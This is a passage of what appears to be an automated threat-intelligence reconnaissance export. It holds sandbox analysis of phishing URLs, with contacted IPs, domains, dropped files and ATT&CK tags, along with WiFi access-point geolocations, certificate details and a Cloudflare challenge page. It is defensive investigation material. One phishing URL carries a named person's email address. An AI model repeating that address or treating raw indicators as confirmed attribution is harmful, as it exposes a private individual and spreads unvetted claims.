{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.43.150:443"\n "13.56.128.144:80"\n "35.186.254.174:443"\n "13.227.74.44:80"\n "13.227.74.106:443"\n "13.227.21.59:80"\n "3.211.201.163:80"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"unbouncepages.com"\n "builder-assets.unbounce.com"\n "d9hhrg4mnvzow.cloudfront.net"\n "events.ub-analytics.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: unbouncepages.com\nDNT: 1\nConnection: Keep-Alive\nCookie: ubvs=01bb35f8-2101-4e87-9fbd-ba8ddc5ca5a4; ubvt=v2%7C01bb35f8-2101-4e87-9fbd-ba8ddc5ca5a4%7C990a4ebc-68cf-4901-9b31-101d12c7742a%3Aa%3Asingle"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "builder-assets.unbounce.com"\n "d34qb8suadcc4g.cloudfront.net"\n "d9hhrg4mnvzow.cloudfront.net"\n "events.ub-analytics.com"\n "llink.to"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "track.salesflare.com"\n "unbouncepages.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarE2C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarECA.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "CabEC9.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabEC9.tmp]- [targetUID: 00000000-00002800]\n "CabDEC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabDEC.tmp]- [targetUID: 00000000-00002800]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"4e220573-sharepoint_105d01m000000000000028_1_.png" has type "PNG image data 193 x 58 8-bit colormap non-interlaced" and extension "png"\n "i_1_.gif" has type "GIF image data version 89a 1 x 1" and extension "gif"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{794b00a9-ee19-11ed-abee-080027e07993}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2ef0821423d1780e.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df2ef0821423d1780e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{794b00a9-ee19-11ed-abee-080027e07993}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe11e6a056823bfb0.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{794b00ab-ee19-11ed-abee-080027e07993}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "TarE2C.tmp" has type "data"- Location: [%TEMP%\\TarE2C.tmp]- [targetUID: 00000000-00002800]\n "main.bundle-85a7477.z_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "sp-2.14.0_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002800]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DF3CF6403DBD3E6A11.TMP" has type "data"- Location: [%TEMP%\\~DF3CF6403DBD3E6A11.TMP]- [targetUID: 00000000-00003084]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003084]\n "~DF2EF0821423D1780E.TMP" has type "data"- Location: [%TEMP%\\~DF2EF0821423D1780E.TMP]- [targetUID: 00000000-00003084]\n "~DF10A6C578EF604E9D.TMP" has type "data"- Location: [%TEMP%\\~DF10A6C578EF604E9D.TMP]- [targetUID: 00000000-00003084]\n "~DFACE34BBDF9ACCA3C.TMP" has type "data"- Location: [%TEMP%\\~DFACE34BBDF9ACCA3C.TMP]- [targetUID: 00000000-00003084]\n "~DFE11E6A056823BFB0.TMP" has type "data"- Location: [%TEMP%\\~DFE11E6A056823BFB0.TMP]- [targetUID: 00000000-00003084]\n "main-7b78720.z_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._794B00A9 | 185.199.109.153 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 0 | 0 | 1 | 0 | None | http://kekw.battleb0t.xyz/ | battleb0t.xyz |
| 2023-05-12 02:54:17 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e062258aa2252-ORD
Content-Encoding: gzip
| 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.211): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:48:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fmelissa.whalen%40atimetals.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6908:120:WilError_01"\n "Local\\SM0:6908:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6908:120:WilError_01"\n "SM0:6908:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "138.91.254.96:443"\n "172.66.40.106:443"\n "35.186.254.174:443"\n "162.241.219.194:443"\n "191.101.3.40:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.salesflare.com"\n "llink.to"\n "track.salesflare.com"\n "west.exchserverdata.one"\n "www.guelphcrc.ca"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fmelissa.whalen%40atimetals.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fwww.guelphcrc.ca%2FI%2Fmelissa.whalen%40atimetals.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006904]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6904_1667563466\\Ruleset Data]- [targetUID: 00000000-00006904]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\6904_501582631\\Filtering Rules]- [targetUID: 00000000-00006904]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\6904_1776893622\\edge_driver.js]- [targetUID: 00000000-00006904]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6904_1776893622\\vendor.bundle.js]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006904]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6904_1776893622\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00006904]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6904_1776893622\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00006904]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00006904]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6904_501582631\\Filtering Rules-AA]- [targetUID: 00000000-00006904]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006904]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006904]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006904]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: N/A]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006904]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006904]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006904]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006904]\n "Tabs_13328191914569285" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13328191914569285]- [targetUID: 00000000-00006904]\n "f42c05eb-7c48-4ba6-b5ad-2a6667a882dc.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\f42c05eb-7c48-4ba6-b5ad-2a6667a882dc.tmp]- [targetUID: 00000000-00006904]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Passport (2.4 GHz) - 070B31 (Net ID: 00:00:C0:07:0B:31) | 52.3759, 4.8975 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys_SES_31322 (Net ID: 00:1C:10:8D:00:CA) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:AB:38) | 50.1188, 8.6843 |
| 2023-05-12 03:09:02 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.100 | 87.248.157.102 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:9E:09:9A) | 34.0544, -118.244 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | San Francisco, California, CA, United States, US |
| 2023-05-12 02:44:12 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | www.battleb0t.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 6 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'EHiPHm0Nl3GyThu9m1wbXjiHVtOqC3bOZB5NH6FZ4WpN/ont8bhxVwykMxIfoGSCjD8SpsL131biQUzVmplSkmz36+Rbm6LpKDPgFi1SZ6sdv468aKRPGhyFreJfGyRxilqUy5qO2EhnuYwrJjSxEU6DGEUFnqpvxw46fNgsaBRKOJ+bUVrPyznWm3WWDmCZ5I4ByfgFEH/V+llAilan1spVCzgSbbNaZnK7v2zKybgKpcf37StU8tcqkL0luzxFnWpTYEMJIRNh3502IKGm2GeIGVQUP6IIgH3pam7apk2jk/MVIAQ55tOJt6IZrTr1Qcj4biXsY3FIPVNAc0sCXlUyI683VVNAnv7kxmJ0SLq0ELP7CILJKsuRkOc2+1w90SBLDbAqCH/GEPeh86EVOXxwcNFZqRIljefJbQxhuH4JevbkysQYXa6LkLXsD5QKQE0OPjJQvEC2SmVFUO8wuJE/HZ29m2obUyVypKKxYzEuV7pCj1nVwt32aW4bF0deBcy4/M4CeO4Epb9dj4xmVGUtKMp/g+OZaEvQnjUgBRlg57NTUuvDL1hFtL478NEE',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
